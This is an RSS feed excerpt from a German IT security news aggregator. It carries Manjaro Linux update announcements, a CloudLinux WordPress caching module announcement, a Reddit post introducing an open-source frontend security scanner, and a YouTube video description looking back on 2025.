Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">(click for more details)</a>
<h2><a name="p-819841-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-819841-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/259267/">590.48.01</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.2.html">25.3.2</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/146.0.1/releasenotes/">146.0.1</a></li>
<li><strong>LibreOffice</strong> <a href="https://blog.documentfoundation.org/blog/2025/12/18/libreoffice-25-8-4/">25.8.4</a></li>
<li><strong>GStreamer</strong> <a href="https://gstreamer.freedesktop.org/news/#2025-12-25T18:00:00Z">1.26.10</a></li>
<li><strong>Cinnamon</strong> and <strong>Deepin</strong> updates</li>
</ul>
<h2><a name="p-819841-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-819841-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.2</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/29/25 18:37 CET)</p>
<ul>
<li>testing core x86_64:  8 new and 8 removed package(s)</li>
<li>testing extra x86_64:  995 new and 1110 removed package(s)</li>
<li>testing multilib x86_64:  28 new and 28 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1175/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing MAx Cache (Beta): Apache Module for Accelerating WordPress Performance]]></title>
<description><![CDATA[At CloudLinux, we're committed to building performance solutions that help hosting providers run websites faster and more efficiently. As part of our AccelerateWP performance optimization solution, we're excited to announce the beta release of MAx Cache. It's an Apache module that changes how Wor...]]></description>
<link>https://tsecurity.de/de/3176517/unix-server/introducing-max-cache-beta-apache-module-for-accelerating-wordpress-performance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3176517/unix-server/introducing-max-cache-beta-apache-module-for-accelerating-wordpress-performance/</guid>
<pubDate>Tue, 23 Dec 2025 18:31:01 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/introducing-max-cache-beta-apache-module-for-accelerating-wordpress-performance" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/max_cache_beta_release.png" alt="Transitioning from Redis to Valkey in CloudLinux OS" class="hs-featured-image"> </a> 
</div> 
<p>At CloudLinux, we're committed to building performance solutions that help hosting providers run websites faster and more efficiently. As part of our <a href="https://cloudlinux.com/acceleratewp/">AccelerateWP</a> performance optimization solution, we're excited to announce the beta release of <strong>MAx Cache. </strong>It's<strong> </strong>an Apache module that changes how WordPress sites handle requests by running PHP only on cache misses, while cached pages for subsequent requests are served by Apache without invoking PHP. The result: significantly faster page load times.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Built an open-source frontend security scanner with a desktop GUI (ShieldEye SurfaceScan) 🔍🛡️]]></title>
<description><![CDATA[Hi all,  over the last months I’ve been tinkering with a side project in my spare time and it slowly grew into something that feels usable, so I decided to put it out there. It ended up as **ShieldEye SurfaceScan** – an open-source desktop app that looks at the **frontend attack surface** of a si...]]></description>
<link>https://tsecurity.de/de/3175079/it-security-nachrichten/built-an-open-source-frontend-security-scanner-with-a-desktop-gui-shieldeye-surfacescan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3175079/it-security-nachrichten/built-an-open-source-frontend-security-scanner-with-a-desktop-gui-shieldeye-surfacescan/</guid>
<pubDate>Tue, 23 Dec 2025 02:50:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi all, </p> <p>over the last months I’ve been tinkering with a side project in my spare time and it slowly grew into something that feels usable, so I decided to put it out there.<br> It ended up as **ShieldEye SurfaceScan** – an open-source desktop app that looks at the **frontend attack surface** of a site. 🔍 </p> <p>The idea is simple: you point it at a URL, it spins up a headless browser, lets the page execute its JavaScript and then tries to make sense of what it sees. It looks at HTML and scripts, guesses which third‑party libraries are in use, checks HTTP security headers and cookies, and then puts everything into a few views: dashboard, detailed results and some basic analytics. If you have Ollama running locally, it can also add a short AI‑generated summary of the situation, but that part is completely optional. 🤖 </p> <p>Under the hood it’s a small stack of services talking to each other: </p> <p>- a GTK desktop GUI written in Python,<br> - an API in Node + TypeScript + Express,<br> - a Playwright-based worker that does the actual page loading and analysis,<br> - PostgreSQL, Redis and MinIO for data, queues and storage. </p> <p>Even though I mainly use it through the GUI, there is also a JSON API behind it (for scans, results and analytics), so it can be driven from scripts or CI if someone prefers to keep it headless. </p> <p>In my head the main audience is: </p> <p>- people learning web security who want something to poke at the frontend surface of their own projects,<br> - developers who like a quick sanity check of headers / JS / deps without wiring a whole pipeline,<br> - anyone who enjoys self‑hosted tools with a native-style UI instead of another browser tab. 🖥️ </p> <p>The code is on GitHub (MIT‑licensed): </p> <p><a href="https://github.com/exiv703/ShieldEye-SurfaceScan">https://github.com/exiv703/ShieldEye-SurfaceScan</a> </p> <p>There’s a README with a bit more detail about the architecture, Docker setup and some screenshots. </p> <p>If you do take it for a spin, I’d be interested in any feedback on:<br> - how the GUI feels to use (what’s confusing or clunky),<br> - what kind of checks you’d expect from a tool focused on the frontend surface,<br> - anything that breaks on other systems (I mostly run it on Linux 🐧). </p> <p>Still treating this as a work in progress, but it’s already at the point where it can run real scans against your own apps and show something useful.i all, </p> <p>over the last months I’ve been tinkering with a side project in my spare time and it slowly grew into something that feels usable, so I decided to put it out there.<br> It ended up as **ShieldEye SurfaceScan** – an open-source desktop app that looks at the **frontend attack surface** of a site. 🔍 </p> <p>The idea is simple: you point it at a URL, it spins up a headless browser, lets the page execute its JavaScript and then tries to make sense of what it sees. It looks at HTML and scripts, guesses which third‑party libraries are in use, checks HTTP security headers and cookies, and then puts everything into a few views: dashboard, detailed results and some basic analytics. If you have Ollama running locally, it can also add a short AI‑generated summary of the situation, but that part is completely optional. 🤖 </p> <p>Under the hood it’s a small stack of services talking to each other: </p> <p>- a GTK desktop GUI written in Python,<br> - an API in Node + TypeScript + Express,<br> - a Playwright-based worker that does the actual page loading and analysis,<br> - PostgreSQL, Redis and MinIO for data, queues and storage. </p> <p>Even though I mainly use it through the GUI, there is also a JSON API behind it (for scans, results and analytics), so it can be driven from scripts or CI if someone prefers to keep it headless. </p> <p>In my head the main audience is: </p> <p>- people learning web security who want something to poke at the frontend surface of their own projects,<br> - developers who like a quick sanity check of headers / JS / deps without wiring a whole pipeline,<br> - anyone who enjoys self‑hosted tools with a native-style UI instead of another browser tab. 🖥️ </p> <p>The code is on GitHub (MIT‑licensed): </p> <p><a href="https://github.com/exiv703/ShieldEye-SurfaceScan">https://github.com/exiv703/ShieldEye-SurfaceScan</a> </p> <p>There’s a README with a bit more detail about the architecture, Docker setup and some screenshots. </p> <p>If you do take it for a spin, I’d be interested in any feedback on:<br> - how the GUI feels to use (what’s confusing or clunky),<br> - what kind of checks you’d expect from a tool focused on the frontend surface,<br> - anything that breaks on other systems (I mostly run it on Linux 🐧). </p> <p>Still treating this as a work in progress, but it’s already at the point where it can run real scans against your own apps and show something useful.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Ok-Performer8659"> /u/Ok-Performer8659 </a> <br> <span><a href="https://www.reddit.com/gallery/1ptbkka">[link]</a></span>   <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1ptbkka/built_an_opensource_frontend_security_scanner/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2025-12-22 - Kernels, Cinnamon, KDE Frameworks, Pacman]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’. We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0.
Important Note: We managed to stabilize ‘Anh-Linh’ enough to release this ...]]></description>
<link>https://tsecurity.de/de/3174609/unix-server/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3174609/unix-server/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/</guid>
<pubDate>Mon, 22 Dec 2025 18:31:04 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’. We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0.</p>
<p>Important Note: We managed to stabilize ‘Anh-Linh’ enough to release this update to our <strong>stable</strong> branch. <mark>However, users of <strong>Plasma</strong> and <strong>GNOME</strong> may lose their <strong>X11</strong> session support. Therefore read our <strong><a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479#p-812262-known-issues-and-solutions-1">Known issues and solutions</a> section</strong> before restarting your systems! </mark></p>
<h3><a name="p-818482-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-818482-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-818482-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-818482-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184/1">(click for more details)</a>
<h2><a name="p-818482-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-818482-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li><strong>linux617</strong> is now marked EOL</li>
</ul>
</li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v258.2...v258.3">258.3</a></li>
<li><strong>Cinnamon</strong> <a href="https://itsfoss.com/news/cinnamon-6-6/">6.6</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.21.0/">6.21.0</a></li>
<li><strong>Pacman</strong> <a href="https://gitlab.archlinux.org/pacman/pacman/-/releases/v7.1.0">7.1.0</a></li>
<li><strong>WebKitGTK</strong> <a href="https://webkitgtk.org/2025/12/16/webkitgtk2.50.4-released.html">2.50.4</a></li>
<li><strong><a href="https://archlinux.org/todo/drop-empty-versioned-dirs-from-any-perl-packages/">perl rebuilds</a></strong></li>
<li><strong>Vulkan-SDK</strong> <a href="https://vulkan.lunarg.com/doc/sdk/1.4.335.0/linux/release_notes.html">1.4.335.0</a></li>
</ul>
<h2><a name="p-818482-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-818482-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.2</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/18/25 18:52)</p>
<ul>
<li>stable core x86_64:  25 new and 22 removed package(s)</li>
<li>stable extra x86_64:  1276 new and 1272 removed package(s)</li>
<li>stable multilib x86_64:  11 new and 11 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1174/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2025-12-22-kernels-cinnamon-kde-frameworks-pacman/184184">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DAS ALLES war DIESES JAHR?!]]></title>
<description><![CDATA[Author: The Morpheus - Bewertung: 18x - Views:132 2025 war ein "AI"-Jahr. Aber es sieht nicht so aus, als würde das aufhören.

Schnappt euch hier den Deal bei Incogni: http://incogni.com/morpheus

MorphReader im PlayStore: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_...]]></description>
<link>https://tsecurity.de/de/3169902/it-security-video/das-alles-war-dieses-jahr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3169902/it-security-video/das-alles-war-dieses-jahr/</guid>
<pubDate>Fri, 19 Dec 2025 17:47:18 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus - Bewertung: 18x - Views:132 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/CI0DI3c3KZc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>2025 war ein "AI"-Jahr. Aber es sieht nicht so aus, als würde das aufhören.<br />
<br />
Schnappt euch hier den Deal bei Incogni: http://incogni.com/morpheus<br />
<br />
MorphReader im PlayStore: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app&hl=de<br />
<br />
MorphReader im App Store: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS-Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Bootstrap Academy: https://bootstrap.academy/<br />
https://github.com/Bootstrap-Academy/<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Quellen:<br />
https://www.4kfilme.de/youtube-stoppt-ai-content-flut-monetarisierung-entfaellt-ab-15-juli/<br />
https://newsroom.spotify.com/2025-09-25/spotify-strengthens-ai-protections/<br />
https://spicylemonade.github.io/AI-2027-tracker/<br />
https://www.nature.com/articles/s41586-022-05172-4<br />
https://un.curl.dev/emails/slaughter.html<br />
https://www.hashicorp.com/de/blog/hashicorp-adopts-business-source-license<br />
https://redis.io/blog/redis-adopts-dual-source-available-licensing/<br />
https://www.mongodb.com/company/newsroom/press-releases/mongodb-issues-new-server-side-public-license-for-mongodb-community-server<br />
https://www.elastic.co/blog/why-license-change-aws<br />
https://arstechnica.com/ai/2025/12/how-openai-is-using-gpt-5-codex-to-improve-the-ai-tool-itself/<br />
https://cacm.acm.org/research/as-good-as-a-coin-toss-human-detection-of-ai-generated-content/<br />
https://www.netinfluencer.com/ugc-tops-trust-rankings-as-ai-posts-face-consumer-skepticism-survey-shows/<br />
https://eu.36kr.com/en/p/3551362253731718<br />
https://www.winssolutions.org/chatgpt-science-errors-fake-papers/<br />
https://graphite.io/five-percent/more-articles-are-now-created-by-ai-than-humans<br />
https://www.theguardian.com/technology/2025/dec/06/ai-research-papers<br />
https://quidgest.com/en/blog-en/generative-ai-by-2025/<br />
https://www.europol.europa.eu/cms/sites/default/files/documents/Europol_Innovation_Lab_Facing_Reality_Law_Enforcement_And_The_Challenge_Of_Deepfakes.pdf<br />
https://huggingface.co/black-forest-labs/FLUX.2-dev<br />
https://runwayml.com/research/introducing-runway-gen-4.5<br />
https://www.anthropic.com/news/disrupting-AI-espionage<br />
https://openai.com/de-DE/global-affairs/introducing-openai-for-government/<br />
https://agi.safe.ai<br />
https://arcprize.org/leaderboard<br />
https://openai.com/de-DE/index/learning-to-reason-with-llms/<br />
https://github.com/anthropics/claude-code/commits/main/?since=2024-12-15&until=2025-04-30<br />
https://www.anthropic.com/engineering/building-agents-with-the-claude-agent-sdk<br />
https://www.finalroundai.com/blog/ai-is-making-it-harder-for-junior-developers-to-get-hired<br />
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=5425555<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-12-18 - Kernels, Systemd, Cinnamon, Pacman, Vulkan-SDK]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3167788/unix-server/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3167788/unix-server/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/</guid>
<pubDate>Thu, 18 Dec 2025 19:30:56 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-817548-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-817548-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-817548-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-817548-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>
<h2><a name="p-817548-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-817548-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li><strong>linux617</strong> is now marked EOL</li>
</ul>
</li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v258.2...v258.3">258.3</a></li>
<li><strong>Cinnamon</strong> <a href="https://itsfoss.com/news/cinnamon-6-6/">6.6</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.21.0/">6.21.0</a></li>
<li><strong>Pacman</strong> <a href="https://gitlab.archlinux.org/pacman/pacman/-/releases/v7.1.0">7.1.0</a></li>
<li><strong>WebKitGTK</strong> <a href="https://webkitgtk.org/2025/12/16/webkitgtk2.50.4-released.html">2.50.4</a></li>
<li><strong><a href="https://archlinux.org/todo/drop-empty-versioned-dirs-from-any-perl-packages/">perl rebuilds</a></strong></li>
<li><strong>Vulkan-SDK</strong> <a href="https://vulkan.lunarg.com/doc/sdk/1.4.335.0/linux/release_notes.html">1.4.335.0</a></li>
</ul>
<h2><a name="p-817548-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-817548-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.2</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/18/25 18:52)</p>
<ul>
<li>testing core x86_64:  25 new and 22 removed package(s)</li>
<li>testing extra x86_64:  1258 new and 1254 removed package(s)</li>
<li>testing multilib x86_64:  11 new and 11 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1173/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>4 posts - 4 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-12-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-10-18 - Kernels, Systemd, Cinnamon, Pacman, Vulkan-SDK]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3167762/unix-server/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3167762/unix-server/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/</guid>
<pubDate>Thu, 18 Dec 2025 19:15:50 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-817548-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-817548-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-817548-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-817548-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>
<h2><a name="p-817548-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-817548-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li><strong>linux617</strong> is now marked EOL</li>
</ul>
</li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v258.2...v258.3">258.3</a></li>
<li><strong>Cinnamon</strong> <a href="https://itsfoss.com/news/cinnamon-6-6/">6.6</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.21.0/">6.21.0</a></li>
<li><strong>Pacman</strong> <a href="https://gitlab.archlinux.org/pacman/pacman/-/releases/v7.1.0">7.1.0</a></li>
<li><strong>WebKitGTK</strong> <a href="https://webkitgtk.org/2025/12/16/webkitgtk2.50.4-released.html">2.50.4</a></li>
<li><strong><a href="https://archlinux.org/todo/drop-empty-versioned-dirs-from-any-perl-packages/">perl rebuilds</a></strong></li>
<li><strong>Vulkan-SDK</strong> <a href="https://vulkan.lunarg.com/doc/sdk/1.4.335.0/linux/release_notes.html">1.4.335.0</a></li>
